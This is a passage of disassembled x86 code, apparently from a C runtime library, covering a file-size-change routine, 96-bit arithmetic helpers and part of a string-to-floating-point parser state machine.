loc_42C5FF: ; CODE XREF: .text:0042C5CF�j
mov esp, ebp
pop ebp
retn
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_42C610 proc near ; CODE XREF: sub_4282A0+44C�p
; .text:0042C5E5�p
var_1024 = dword ptr -1024h
var_1020 = dword ptr -1020h
var_101C = dword ptr -101Ch
var_1018 = dword ptr -1018h
var_1014 = dword ptr -1014h
var_1010 = dword ptr -1010h
var_100C = dword ptr -100Ch
var_1008 = dword ptr -1008h
var_1004 = byte ptr -1004h
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
mov eax, 1024h
call sub_418D40
push ebx
push esi
push edi
lea eax, [ebp+var_1004]
mov [ebp+var_1014], eax
mov [ebp+var_101C], 0
loc_42C636: ; CODE XREF: sub_42C610+51�j
cmp [ebp+arg_4], 0
jge short loc_42C65D
push offset aSize0 ; "size >= 0"
push 0
push 81h
push offset aChsize_c ; "chsize.c"
push 2
call sub_41BF80
add esp, 14h
cmp eax, 1
jnz short loc_42C65D
int 3 ; Trap to Debugger
loc_42C65D: ; CODE XREF: sub_42C610+2A�j
; sub_42C610+4A�j
xor ecx, ecx
test ecx, ecx
jnz short loc_42C636
push 1
push 0
mov edx, [ebp+arg_0]
push edx
call sub_424B90
add esp, 0Ch
mov [ebp+var_100C], eax
cmp [ebp+var_100C], 0FFFFFFFFh
jz short loc_42C6A1
push 2
push 0
mov eax, [ebp+arg_0]
push eax
call sub_424B90
add esp, 0Ch
mov [ebp+var_1010], eax
cmp [ebp+var_1010], 0FFFFFFFFh
jnz short loc_42C6A9
loc_42C6A1: ; CODE XREF: sub_42C610+70�j
or eax, 0FFFFFFFFh
jmp loc_42C839
; ---------------------------------------------------------------------------
loc_42C6A9: ; CODE XREF: sub_42C610+8F�j
mov ecx, [ebp+arg_4]
sub ecx, [ebp+var_1010]
mov [ebp+var_1018], ecx
cmp [ebp+var_1018], 0
jle loc_42C7C0
push 1000h
push 0
mov edx, [ebp+var_1014]
push edx
call sub_4189A0
add esp, 0Ch
push 8000h
mov eax, [ebp+arg_0]
push eax
call sub_42F8C0
add esp, 8
mov [ebp+var_4], eax
loc_42C6EF: ; CODE XREF: sub_42C610+198�j
cmp [ebp+var_1018], 1000h
jl short loc_42C707
mov [ebp+var_1020], 1000h
jmp short loc_42C713
; ---------------------------------------------------------------------------
loc_42C707: ; CODE XREF: sub_42C610+E9�j
mov ecx, [ebp+var_1018]
mov [ebp+var_1020], ecx
loc_42C713: ; CODE XREF: sub_42C610+F5�j
mov edx, [ebp+var_1020]
mov [ebp+var_1008], edx
cmp [ebp+var_1018], 1000h
jl short loc_42C737
mov [ebp+var_1024], 1000h
jmp short loc_42C743
; ---------------------------------------------------------------------------
loc_42C737: ; CODE XREF: sub_42C610+119�j
mov eax, [ebp+var_1018]
mov [ebp+var_1024], eax
loc_42C743: ; CODE XREF: sub_42C610+125�j
mov ecx, [ebp+var_1024]
push ecx
mov edx, [ebp+var_1014]
push edx
mov eax, [ebp+arg_0]
push eax
call sub_422400
add esp, 0Ch
mov [ebp+var_1008], eax
cmp [ebp+var_1008], 0FFFFFFFFh
jnz short loc_42C78F
call sub_422F30
cmp dword ptr [eax], 5
jnz short loc_42C781
call sub_422F20
mov dword ptr [eax], 0Dh
loc_42C781: ; CODE XREF: sub_42C610+164�j
mov ecx, [ebp+var_1008]
mov [ebp+var_101C], ecx
jmp short loc_42C7AE
; ---------------------------------------------------------------------------
loc_42C78F: ; CODE XREF: sub_42C610+15A�j
mov edx, [ebp+var_1018]
sub edx, [ebp+var_1008]
mov [ebp+var_1018], edx
cmp [ebp+var_1018], 0
jg loc_42C6EF
loc_42C7AE: ; CODE XREF: sub_42C610+17D�j
mov eax, [ebp+var_4]
push eax
mov ecx, [ebp+arg_0]
push ecx
call sub_42F8C0
add esp, 8
jmp short loc_42C81E
; ---------------------------------------------------------------------------
loc_42C7C0: ; CODE XREF: sub_42C610+AF�j
cmp [ebp+var_1018], 0
jge short loc_42C81E
push 0
mov edx, [ebp+arg_4]
push edx
mov eax, [ebp+arg_0]
push eax
call sub_424B90
add esp, 0Ch
mov ecx, [ebp+arg_0]
push ecx
call sub_427F40
add esp, 4
push eax
call ds:dword_4942A4
neg eax
sbb eax, eax
neg eax
dec eax
mov [ebp+var_101C], eax
cmp [ebp+var_101C], 0FFFFFFFFh
jnz short loc_42C81E
call sub_422F20
mov dword ptr [eax], 0Dh
call ds:dword_4942F0
mov esi, eax
call sub_422F30
mov [eax], esi
loc_42C81E: ; CODE XREF: sub_42C610+1AE�j
; sub_42C610+1B7�j ...
push 0
mov edx, [ebp+var_100C]
push edx
mov eax, [ebp+arg_0]
push eax
call sub_424B90
add esp, 0Ch
mov eax, [ebp+var_101C]
loc_42C839: ; CODE XREF: sub_42C610+94�j
pop edi
pop esi
pop ebx
mov esp, ebp
pop ebp
retn
sub_42C610 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_42C840 proc near ; CODE XREF: sub_428D30+53�p
; sub_428D30+94�p ...
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
sub esp, 8
mov [ebp+var_8], 0
mov eax, [ebp+arg_0]
add eax, [ebp+arg_4]
mov [ebp+var_4], eax
mov ecx, [ebp+var_4]
cmp ecx, [ebp+arg_0]
jb short loc_42C866
mov edx, [ebp+var_4]
cmp edx, [ebp+arg_4]
jnb short loc_42C86F
loc_42C866: ; CODE XREF: sub_42C840+1C�j
mov eax, [ebp+var_8]
add eax, 1
mov [ebp+var_8], eax
loc_42C86F: ; CODE XREF: sub_42C840+24�j
mov ecx, [ebp+arg_8]
mov edx, [ebp+var_4]
mov [ecx], edx
mov eax, [ebp+var_8]
mov esp, ebp
pop ebp
retn
sub_42C840 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_42C880 proc near ; CODE XREF: sub_42CA00+77�p
; sub_42CA00+AA�p ...
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
sub esp, 0Ch
mov eax, [ebp+arg_0]
push eax
mov ecx, [ebp+arg_4]
mov edx, [ecx]
push edx
mov eax, [ebp+arg_0]
mov ecx, [eax]
push ecx
call sub_42C840
add esp, 0Ch
mov [ebp+var_4], eax
cmp [ebp+var_4], 0
jz short loc_42C8D7
mov edx, [ebp+arg_0]
add edx, 4
push edx
push 1
mov eax, [ebp+arg_0]
mov ecx, [eax+4]
push ecx
call sub_42C840
add esp, 0Ch
mov [ebp+var_8], eax
cmp [ebp+var_8], 0
jz short loc_42C8D7
mov edx, [ebp+arg_0]
mov eax, [edx+8]
add eax, 1
mov ecx, [ebp+arg_0]
mov [ecx+8], eax
loc_42C8D7: ; CODE XREF: sub_42C880+25�j
; sub_42C880+46�j
mov edx, [ebp+arg_0]
add edx, 4
push edx
mov eax, [ebp+arg_4]
mov ecx, [eax+4]
push ecx
mov edx, [ebp+arg_0]
mov eax, [edx+4]
push eax
call sub_42C840
add esp, 0Ch
mov [ebp+var_C], eax
cmp [ebp+var_C], 0
jz short loc_42C90C
mov ecx, [ebp+arg_0]
mov edx, [ecx+8]
add edx, 1
mov eax, [ebp+arg_0]
mov [eax+8], edx
loc_42C90C: ; CODE XREF: sub_42C880+7B�j
mov ecx, [ebp+arg_0]
add ecx, 8
push ecx
mov edx, [ebp+arg_4]
mov eax, [edx+8]
push eax
mov ecx, [ebp+arg_0]
mov edx, [ecx+8]
push edx
call sub_42C840
add esp, 0Ch
mov esp, ebp
pop ebp
retn
sub_42C880 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_42C930 proc near ; CODE XREF: sub_42CA00+5B�p
; sub_42CA00+67�p ...
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
sub esp, 8
mov eax, [ebp+arg_0]
mov ecx, [eax]
and ecx, 80000000h
neg ecx
sbb ecx, ecx
neg ecx
mov [ebp+var_4], ecx
mov edx, [ebp+arg_0]
mov eax, [edx+4]
and eax, 80000000h
neg eax
sbb eax, eax
neg eax
mov [ebp+var_8], eax
mov ecx, [ebp+arg_0]
mov edx, [ecx]
shl edx, 1
mov eax, [ebp+arg_0]
mov [eax], edx
mov ecx, [ebp+arg_0]
mov edx, [ecx+4]
shl edx, 1
or edx, [ebp+var_4]
mov eax, [ebp+arg_0]
mov [eax+4], edx
mov ecx, [ebp+arg_0]
mov edx, [ecx+8]
shl edx, 1
or edx, [ebp+var_8]
mov eax, [ebp+arg_0]
mov [eax+8], edx
mov esp, ebp
pop ebp
retn
sub_42C930 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_42C990 proc near ; CODE XREF: sub_42D6C0+382�p
; sub_42F990+316�p
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
sub esp, 8
mov eax, [ebp+arg_0]
mov ecx, [eax+8]
and ecx, 1
neg ecx
sbb ecx, ecx
and ecx, 80000000h
mov [ebp+var_8], ecx
mov edx, [ebp+arg_0]
mov eax, [edx+4]
and eax, 1
neg eax
sbb eax, eax
and eax, 80000000h
mov [ebp+var_4], eax
mov ecx, [ebp+arg_0]
mov edx, [ecx+8]
shr edx, 1
mov eax, [ebp+arg_0]
mov [eax+8], edx
mov ecx, [ebp+arg_0]
mov edx, [ecx+4]
shr edx, 1
or edx, [ebp+var_8]
mov eax, [ebp+arg_0]
mov [eax+4], edx
mov ecx, [ebp+arg_0]
mov edx, [ecx]
shr edx, 1
or edx, [ebp+var_4]
mov eax, [ebp+arg_0]
mov [eax], edx
mov esp, ebp
pop ebp
retn
sub_42C990 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_42CA00 proc near ; CODE XREF: sub_42CB40+8A7�p
var_10 = word ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
sub esp, 10h
mov [ebp+var_10], 404Eh
mov eax, [ebp+arg_8]
mov dword ptr [eax], 0
mov ecx, [ebp+arg_8]
mov dword ptr [ecx+4], 0
mov edx, [ebp+arg_8]
mov dword ptr [edx+8], 0
jmp short loc_42CA3D
; ---------------------------------------------------------------------------
loc_42CA2B: ; CODE XREF: sub_42CA00+B2�j
mov eax, [ebp+arg_4]
sub eax, 1
mov [ebp+arg_4], eax
mov ecx, [ebp+arg_0]
add ecx, 1
mov [ebp+arg_0], ecx
loc_42CA3D: ; CODE XREF: sub_42CA00+29�j
cmp [ebp+arg_4], 0
jbe short loc_42CAB7
mov edx, [ebp+arg_8]
mov eax, [edx]
mov [ebp+var_C], eax
mov ecx, [edx+4]
mov [ebp+var_8], ecx
mov edx, [edx+8]
mov [ebp+var_4], edx
mov eax, [ebp+arg_8]
push eax
call sub_42C930
add esp, 4
mov ecx, [ebp+arg_8]
push ecx
call sub_42C930
add esp, 4
lea edx, [ebp+var_C]
push edx
mov eax, [ebp+arg_8]
push eax
call sub_42C880
add esp, 8
mov ecx, [ebp+arg_8]
push ecx
call sub_42C930
add esp, 4
mov edx, [ebp+arg_0]
movsx eax, byte ptr [edx]
mov [ebp+var_C], eax
mov [ebp+var_8], 0
mov [ebp+var_4], 0
lea ecx, [ebp+var_C]
push ecx
mov edx, [ebp+arg_8]
push edx
call sub_42C880
add esp, 8
jmp loc_42CA2B
; ---------------------------------------------------------------------------
loc_42CAB7: ; CODE XREF: sub_42CA00+41�j
; sub_42CA00+101�j
mov eax, [ebp+arg_8]
cmp dword ptr [eax+8], 0
jnz short loc_42CB03
mov ecx, [ebp+arg_8]
mov edx, [ecx+4]
shr edx, 10h
mov eax, [ebp+arg_8]
mov [eax+8], edx
mov ecx, [ebp+arg_8]
mov edx, [ecx+4]
shl edx, 10h
mov eax, [ebp+arg_8]
mov ecx, [eax]
shr ecx, 10h
or edx, ecx
mov eax, [ebp+arg_8]
mov [eax+4], edx
mov ecx, [ebp+arg_8]
mov edx, [ecx]
shl edx, 10h
mov eax, [ebp+arg_8]
mov [eax], edx
mov cx, [ebp+var_10]
sub cx, 10h
mov [ebp+var_10], cx
jmp short loc_42CAB7
; ---------------------------------------------------------------------------
loc_42CB03: ; CODE XREF: sub_42CA00+BE�j
; sub_42CA00+12A�j
mov edx, [ebp+arg_8]
mov eax, [edx+8]
and eax, 8000h
test eax, eax
jnz short loc_42CB2C
mov ecx, [ebp+arg_8]
push ecx
call sub_42C930
add esp, 4
mov dx, [ebp+var_10]
sub dx, 1
mov [ebp+var_10], dx
jmp short loc_42CB03
; ---------------------------------------------------------------------------
loc_42CB2C: ; CODE XREF: sub_42CA00+110�j
mov eax, [ebp+arg_8]
mov cx, [ebp+var_10]
mov [eax+0Ah], cx
mov esp, ebp
pop ebp
retn
sub_42CA00 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_42CB40 proc near ; CODE XREF: sub_4293C0+1A�p
; .text:0042941A�p ...
var_B4 = byte ptr -0B4h
var_B0 = dword ptr -0B0h
var_AC = dword ptr -0ACh
var_A8 = byte ptr -0A8h
var_A4 = byte ptr -0A4h
var_A0 = dword ptr -0A0h
var_9C = dword ptr -9Ch
var_98 = dword ptr -98h
var_94 = dword ptr -94h
var_90 = dword ptr -90h
var_8C = byte ptr -8Ch
var_88 = dword ptr -88h
var_84 = byte ptr -84h
var_80 = dword ptr -80h
var_7C = dword ptr -7Ch
var_78 = dword ptr -78h
var_74 = dword ptr -74h
var_70 = dword ptr -70h
var_6C = dword ptr -6Ch
var_68 = dword ptr -68h
var_64 = dword ptr -64h
var_60 = word ptr -60h
var_5E = dword ptr -5Eh
var_5A = dword ptr -5Ah
var_56 = word ptr -56h
var_54 = dword ptr -54h
var_50 = dword ptr -50h
var_4C = dword ptr -4Ch
var_48 = word ptr -48h
var_44 = dword ptr -44h
var_40 = dword ptr -40h
var_3C = dword ptr -3Ch
var_38 = byte ptr -38h
var_21 = byte ptr -21h
var_1C = dword ptr -1Ch
var_18 = dword ptr -18h
var_14 = dword ptr -14h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
arg_10 = dword ptr 18h
arg_14 = dword ptr 1Ch
arg_18 = dword ptr 20h
push ebp
mov ebp, esp
sub esp, 0B4h
lea eax, [ebp+var_38]
mov [ebp+var_68], eax
mov word ptr [ebp+var_1C], 0
mov [ebp+var_74], 1
mov [ebp+var_70], 0
mov [ebp+var_54], 0
mov [ebp+var_C], 0
mov [ebp+var_18], 0
mov [ebp+var_40], 0
mov [ebp+var_78], 0
mov [ebp+var_14], 0
mov [ebp+var_6C], 0
mov [ebp+var_44], 0
mov [ebp+var_4C], 0
mov ecx, [ebp+arg_8]
mov [ebp+var_4], ecx
mov edx, [ebp+var_4]
mov [ebp+var_64], edx
jmp short loc_42CBB9
; ---------------------------------------------------------------------------
loc_42CBB0: ; CODE XREF: sub_42CB40:loc_42CBE5�j
mov eax, [ebp+var_4]
add eax, 1
mov [ebp+var_4], eax
loc_42CBB9: ; CODE XREF: sub_42CB40+6E�j
mov ecx, [ebp+var_4]
movsx edx, byte ptr [ecx]
cmp edx, 20h
jz short loc_42CBE5
mov eax, [ebp+var_4]
movsx ecx, byte ptr [eax]
cmp ecx, 9
jz short loc_42CBE5
mov edx, [ebp+var_4]
movsx eax, byte ptr [edx]
cmp eax, 0Ah
jz short loc_42CBE5
mov ecx, [ebp+var_4]
movsx edx, byte ptr [ecx]
cmp edx, 0Dh
jnz short loc_42CBE7
loc_42CBE5: ; CODE XREF: sub_42CB40+82�j
; sub_42CB40+8D�j ...
jmp short loc_42CBB0
; ---------------------------------------------------------------------------
loc_42CBE7: ; CODE XREF: sub_42CB40+A3�j
; sub_42CB40:loc_42D343�j
cmp [ebp+var_4C], 0Ah
jz loc_42D348
mov eax, [ebp+var_4]
mov cl, [eax]
mov byte ptr [ebp+var_3C], cl
mov edx, [ebp+var_4]
add edx, 1
mov [ebp+var_4], edx
mov eax, [ebp+var_4C]
mov [ebp+var_80], eax
cmp [ebp+var_80], 0Bh
ja loc_42D343
mov ecx, [ebp+var_80]
jmp ds:off_42D55A[ecx*4]
loc_42CC1C: ; DATA XREF: .text:off_42D55A�o
movsx edx, byte ptr [ebp+var_3C]
cmp edx, 31h
jl short loc_42CC40
movsx eax, byte ptr [ebp+var_3C]
cmp eax, 39h
jg short loc_42CC40
mov [ebp+var_4C], 3
mov ecx, [ebp+var_4]
sub ecx, 1
mov [ebp+var_4], ecx
jmp short loc_42CCB5
; ---------------------------------------------------------------------------
loc_42CC40: ; CODE XREF: sub_42CB40+E3�j
; sub_42CB40+EC�j
movsx edx, byte ptr [ebp+var_3C]
movsx eax, byte_442F5C
cmp edx, eax
jnz short loc_42CC58
mov [ebp+var_4C], 5
jmp short loc_42CCB5
; ---------------------------------------------------------------------------
loc_42CC58: ; CODE XREF: sub_42CB40+10D�j
mov cl, byte ptr [ebp+var_3C]
mov [ebp+var_84], cl
cmp [ebp+var_84], 2Bh
jz short loc_42CC87
cmp [ebp+var_84], 2Dh
jz short loc_42CC96
cmp [ebp+var_84], 30h
jz short loc_42CC7E
jmp short loc_42CCA5
; ---------------------------------------------------------------------------
loc_42CC7E: ; CODE XREF: sub_42CB40+13A�j
mov [ebp+var_4C], 1
jmp short loc_42CCB5
; ---------------------------------------------------------------------------
loc_42CC87: ; CODE XREF: sub_42CB40+128�j
mov [ebp+var_4C], 2
mov word ptr [ebp+var_1C], 0
jmp short loc_42CCB5
; ---------------------------------------------------------------------------
loc_42CC96: ; CODE XREF: sub_42CB40+131�j
mov [ebp+var_4C], 2
mov word ptr [ebp+var_1C], 8000h
jmp short loc_42CCB5
; ---------------------------------------------------------------------------
loc_42CCA5: ; CODE XREF: sub_42CB40+13C�j
mov [ebp+var_4C], 0Ah
mov edx, [ebp+var_4]
sub edx, 1
mov [ebp+var_4], edx
loc_42CCB5: ; CODE XREF: sub_42CB40+FE�j
; sub_42CB40+116�j ...
jmp loc_42D343
; ---------------------------------------------------------------------------
loc_42CCBA: ; CODE XREF: sub_42CB40+D5�j
; DATA XREF: .text:0042D55E�o
mov [ebp+var_54], 1
movsx eax, byte ptr [ebp+var_3C]
cmp eax, 31h
jl short loc_42CCE8
movsx ecx, byte ptr [ebp+var_3C]
cmp ecx, 39h
jg short loc_42CCE8
mov [ebp+var_4C], 3
mov edx, [ebp+var_4]
sub edx, 1
mov [ebp+var_4], edx
jmp loc_42CD6B
; ---------------------------------------------------------------------------
loc_42CCE8: ; CODE XREF: sub_42CB40+188�j
; sub_42CB40+191�j
movsx eax, byte ptr [ebp+var_3C]
movsx ecx, byte_442F5C
cmp eax, ecx
jnz short loc_42CD00
mov [ebp+var_4C], 4
jmp short loc_42CD6B
; ---------------------------------------------------------------------------
loc_42CD00: ; CODE XREF: sub_42CB40+1B5�j
movsx edx, byte ptr [ebp+var_3C]
mov [ebp+var_88], edx
mov eax, [ebp+var_88]
sub eax, 2Bh
mov [ebp+var_88], eax
cmp [ebp+var_88], 3Ah
ja short loc_42CD5B
mov edx, [ebp+var_88]
xor ecx, ecx
mov cl, ds:byte_42D59A[edx]
jmp ds:off_42D58A[ecx*4]
loc_42CD37: ; CODE XREF: sub_42CB40+D5�j
; DATA XREF: .text:0042D58E�o
mov [ebp+var_4C], 1
jmp short loc_42CD6B
; ---------------------------------------------------------------------------
loc_42CD40: ; CODE XREF: sub_42CB40+D5�j
; sub_42CB40+1F0�j
; DATA XREF: ...
mov [ebp+var_4C], 6
jmp short loc_42CD6B
; ---------------------------------------------------------------------------
loc_42CD49: ; CODE XREF: sub_42CB40+D5�j
; sub_42CB40+1F0�j
; DATA XREF: ...
mov eax, [ebp+var_4]
sub eax, 1
mov [ebp+var_4], eax
mov [ebp+var_4C], 0Bh
jmp short loc_42CD6B
; ---------------------------------------------------------------------------
loc_42CD5B: ; CODE XREF: sub_42CB40+D5�j
; sub_42CB40+1E0�j ...
mov [ebp+var_4C], 0Ah
mov ecx, [ebp+var_4]
sub ecx, 1
mov [ebp+var_4], ecx
loc_42CD6B: ; CODE XREF: sub_42CB40+1A3�j
; sub_42CB40+1BE�j ...
jmp loc_42D343
; ---------------------------------------------------------------------------
loc_42CD70: ; CODE XREF: sub_42CB40+D5�j
; DATA XREF: .text:0042D562�o
movsx edx, byte ptr [ebp+var_3C]
cmp edx, 31h
jl short loc_42CD94
movsx eax, byte ptr [ebp+var_3C]
cmp eax, 39h
jg short loc_42CD94
mov [ebp+var_4C], 3
mov ecx, [ebp+var_4]
sub ecx, 1
mov [ebp+var_4], ecx
jmp short loc_42CDD6
; ---------------------------------------------------------------------------
loc_42CD94: ; CODE XREF: sub_42CB40+237�j
; sub_42CB40+240�j
movsx edx, byte ptr [ebp+var_3C]
movsx eax, byte_442F5C
cmp edx, eax
jnz short loc_42CDAC
mov [ebp+var_4C], 5
jmp short loc_42CDD6
; ---------------------------------------------------------------------------
loc_42CDAC: ; CODE XREF: sub_42CB40+261�j
mov cl, byte ptr [ebp+var_3C]
mov [ebp+var_8C], cl
cmp [ebp+var_8C], 30h
jz short loc_42CDC0
jmp short loc_42CDC9
; ---------------------------------------------------------------------------
loc_42CDC0: ; CODE XREF: sub_42CB40+27C�j
mov [ebp+var_4C], 1
jmp short loc_42CDD6
; ---------------------------------------------------------------------------
loc_42CDC9: ; CODE XREF: sub_42CB40+27E�j
mov [ebp+var_4C], 0Ah
mov edx, [ebp+var_64]
mov [ebp+var_4], edx
loc_42CDD6: ; CODE XREF: sub_42CB40+252�j
; sub_42CB40+26A�j ...
jmp loc_42D343
; ---------------------------------------------------------------------------
loc_42CDDB: ; CODE XREF: sub_42CB40+D5�j
; DATA XREF: .text:0042D566�o
mov [ebp+var_54], 1
jmp short loc_42CDF5
; ---------------------------------------------------------------------------
loc_42CDE4: ; CODE XREF: sub_42CB40:loc_42CE6F�j
mov eax, [ebp+var_4]
mov cl, [eax]
mov byte ptr [ebp+var_3C], cl
mov edx, [ebp+var_4]
add edx, 1
mov [ebp+var_4], edx
loc_42CDF5: ; CODE XREF: sub_42CB40+2A2�j
cmp dword_442F58, 1
jle short loc_42CE19
push 4
mov eax, [ebp+var_3C]
and eax, 0FFh
push eax
call sub_41E750
add esp, 8
mov [ebp+var_90], eax
jmp short loc_42CE37
; ---------------------------------------------------------------------------
loc_42CE19: ; CODE XREF: sub_42CB40+2BC�j
mov ecx, [ebp+var_3C]
and ecx, 0FFh
mov edx, off_442D4C
xor eax, eax
mov ax, [edx+ecx*2]
and eax, 4
mov [ebp+var_90], eax
loc_42CE37: ; CODE XREF: sub_42CB40+2D7�j
cmp [ebp+var_90], 0
jz short loc_42CE74
cmp [ebp+var_70], 19h
jnb short loc_42CE66
mov ecx, [ebp+var_70]
add ecx, 1
mov [ebp+var_70], ecx
movsx edx, byte ptr [ebp+var_3C]
sub edx, 30h
mov eax, [ebp+var_68]
mov [eax], dl
mov ecx, [ebp+var_68]
add ecx, 1
mov [ebp+var_68], ecx
jmp short loc_42CE6F
; ---------------------------------------------------------------------------
loc_42CE66: ; CODE XREF: sub_42CB40+304�j
mov edx, [ebp+var_6C]
add edx, 1
mov [ebp+var_6C], edx
loc_42CE6F: ; CODE XREF: sub_42CB40+324�j
jmp loc_42CDE4
; ---------------------------------------------------------------------------
loc_42CE74: ; CODE XREF: sub_42CB40+2FE�j
movsx eax, byte ptr [ebp+var_3C]
movsx ecx, byte_442F5C
cmp eax, ecx
jnz short loc_42CE8C
mov [ebp+var_4C], 4
jmp short loc_42CEEE
; ---------------------------------------------------------------------------
loc_42CE8C: ; CODE XREF: sub_42CB40+341�j
movsx edx, byte ptr [ebp+var_3C]
mov [ebp+var_94], edx
mov eax, [ebp+var_94]
sub eax, 2Bh
mov [ebp+var_94], eax
cmp [ebp+var_94], 3Ah
ja short loc_42CEDE
mov edx, [ebp+var_94]
xor ecx, ecx
mov cl, ds:byte_42D5E1[edx]
jmp ds:off_42D5D5[ecx*4]
loc_42CEC3: ; DATA XREF: .text:0042D5D9�o
mov [ebp+var_4C], 6
jmp short loc_42CEEE
; ---------------------------------------------------------------------------
loc_42CECC: ; CODE XREF: sub_42CB40+37C�j
; DATA XREF: .text:off_42D5D5�o
mov eax, [ebp+var_4]
sub eax, 1
mov [ebp+var_4], eax
mov [ebp+var_4C], 0Bh
jmp short loc_42CEEE
; ---------------------------------------------------------------------------
loc_42CEDE: ; CODE XREF: sub_42CB40+36C�j
; sub_42CB40+37C�j
; DATA XREF: ...
mov [ebp+var_4C], 0Ah
mov ecx, [ebp+var_4]
sub ecx, 1
mov [ebp+var_4], ecx
loc_42CEEE: ; CODE XREF: sub_42CB40+34A�j
; sub_42CB40+38A�j ...
jmp loc_42D343
; ---------------------------------------------------------------------------
loc_42CEF3: ; CODE XREF: sub_42CB40+D5�j
; DATA XREF: .text:0042D56A�o
mov [ebp+var_54], 1
mov [ebp+var_C], 1
cmp [ebp+var_70], 0
jnz short loc_42CF2E
jmp short loc_42CF1A
; ---------------------------------------------------------------------------
loc_42CF09: ; CODE XREF: sub_42CB40+3EC�j
mov edx, [ebp+var_4]
mov al, [edx]
mov byte ptr [ebp+var_3C], al
mov ecx, [ebp+var_4]
add ecx, 1
mov [ebp+var_4], ecx
loc_42CF1A: ; CODE XREF: sub_42CB40+3C7�j
movsx edx, byte ptr [ebp+var_3C]
cmp edx, 30h
jnz short loc_42CF2E
mov eax, [ebp+var_6C]
sub eax, 1
mov [ebp+var_6C], eax
jmp short loc_42CF09
; ---------------------------------------------------------------------------
loc_42CF2E: ; CODE XREF: sub_42CB40+3C5�j
; sub_42CB40+3E1�j
jmp short loc_42CF41
; ---------------------------------------------------------------------------
loc_42CF30: ; CODE XREF: sub_42CB40:loc_42CFB9�j
mov ecx, [ebp+var_4]
mov dl, [ecx]
mov byte ptr [ebp+var_3C], dl
mov eax, [ebp+var_4]
add eax, 1
mov [ebp+var_4], eax
loc_42CF41: ; CODE XREF: sub_42CB40:loc_42CF2E�j
cmp dword_442F58, 1
jle short loc_42CF66
push 4
mov ecx, [ebp+var_3C]
and ecx, 0FFh
push ecx
call sub_41E750
add esp, 8
mov [ebp+var_98], eax
jmp short loc_42CF83
; ---------------------------------------------------------------------------
loc_42CF66: ; CODE XREF: sub_42CB40+408�j
mov edx, [ebp+var_3C]
and edx, 0FFh
mov eax, off_442D4C
xor ecx, ecx
mov cx, [eax+edx*2]
and ecx, 4
mov [ebp+var_98], ecx
loc_42CF83: ; CODE XREF: sub_42CB40+424�j
cmp [ebp+var_98], 0
jz short loc_42CFBE
cmp [ebp+var_70], 19h
jnb short loc_42CFB9
mov edx, [ebp+var_70]
add edx, 1
mov [ebp+var_70], edx
movsx eax, byte ptr [ebp+var_3C]
sub eax, 30h
mov ecx, [ebp+var_68]
mov [ecx], al
mov edx, [ebp+var_68]
add edx, 1
mov [ebp+var_68], edx
mov eax, [ebp+var_6C]
sub eax, 1
mov [ebp+var_6C], eax
loc_42CFB9: ; CODE XREF: sub_42CB40+450�j
jmp loc_42CF30
; ---------------------------------------------------------------------------
loc_42CFBE: ; CODE XREF: sub_42CB40+44A�j
movsx ecx, byte ptr [ebp+var_3C]
mov [ebp+var_9C], ecx
mov edx, [ebp+var_9C]
sub edx, 2Bh
mov [ebp+var_9C], edx
cmp [ebp+var_9C], 3Ah
ja short loc_42D010
mov ecx, [ebp+var_9C]
xor eax, eax
mov al, ds:byte_42D628[ecx]
jmp ds:off_42D61C[eax*4]
loc_42CFF5: ; DATA XREF: .text:0042D620�o
mov [ebp+var_4C], 6
jmp short loc_42D020
; ---------------------------------------------------------------------------
loc_42CFFE: ; CODE XREF: sub_42CB40+4AE�j
; DATA XREF: .text:off_42D61C�o
mov edx, [ebp+var_4]
sub edx, 1
mov [ebp+var_4], edx
mov [ebp+var_4C], 0Bh
jmp short loc_42D020
; ---------------------------------------------------------------------------
loc_42D010: ; CODE XREF: sub_42CB40+49E�j
; sub_42CB40+4AE�j
; DATA XREF: ...
mov [ebp+var_4C], 0Ah
mov eax, [ebp+var_4]
sub eax, 1
mov [ebp+var_4], eax
loc_42D020: ; CODE XREF: sub_42CB40+4BC�j
; sub_42CB40+4CE�j
jmp loc_42D343
; ---------------------------------------------------------------------------
loc_42D025: ; CODE XREF: sub_42CB40+D5�j
; DATA XREF: .text:0042D56E�o
mov [ebp+var_C], 1
cmp dword_442F58, 1
jle short loc_42D051
push 4
mov ecx, [ebp+var_3C]
and ecx, 0FFh
push ecx
call sub_41E750
add esp, 8
mov [ebp+var_A0], eax
jmp short loc_42D06E
; ---------------------------------------------------------------------------
loc_42D051: ; CODE XREF: sub_42CB40+4F3�j
mov edx, [ebp+var_3C]
and edx, 0FFh
mov eax, off_442D4C
xor ecx, ecx
mov cx, [eax+edx*2]
and ecx, 4
mov [ebp+var_A0], ecx
loc_42D06E: ; CODE XREF: sub_42CB40+50F�j
cmp [ebp+var_A0], 0
jz short loc_42D089
mov [ebp+var_4C], 4
mov edx, [ebp+var_4]
sub edx, 1
mov [ebp+var_4], edx
jmp short loc_42D096
; ---------------------------------------------------------------------------
